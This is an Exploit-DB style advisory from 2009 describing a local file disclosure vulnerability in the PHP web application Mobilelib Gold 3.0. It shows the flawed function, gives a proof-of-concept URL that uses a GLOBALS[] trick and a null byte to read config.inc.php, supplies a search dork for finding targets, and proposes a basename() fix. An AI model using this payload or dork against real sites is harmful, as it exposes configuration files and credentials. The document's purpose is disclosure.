Mobilelib Gold 3.0 - Local File Disclosure

EDB-ID:

9144


Author:

Qabandi

Type:

webapps


Platform:

PHP

Date:

2009-07-14


                                            ||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ\__
                                        __/QQQ/````````````````\QQQ\___
                                      _/QQQQQ/                  \QQQQQQ\
                                     /QQQQ/``                    ```QQQQ\
                                    /QQQQ/                          \QQQQ\
                                   |QQQQ/    By  Qabandi             \QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
                                    \QQQQ\                      __  /QQQQ/
                                     \QQQQ\                    /QQ\_QQQQ/
                                      \QQQQ\                   \QQQQQQQ/
                                       \QQQQQ\                 /QQQQQ/_
                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                              ```````````````````     `````

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY:  		http://www.ac4p.com/
=Download:      ~~~
=DORK:		intext:"English for dummies"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
      }
      return $html;
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the security, where it takes all _GET variables and scans if
 they contain harmful tags such as the null char (%00) ..etc
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      $page = basename($page); //<---- Added the good old Basename func ;)
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
      }
      return $html;
}


---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              \
|      Sec-Code.com ;)  Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!   |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-14]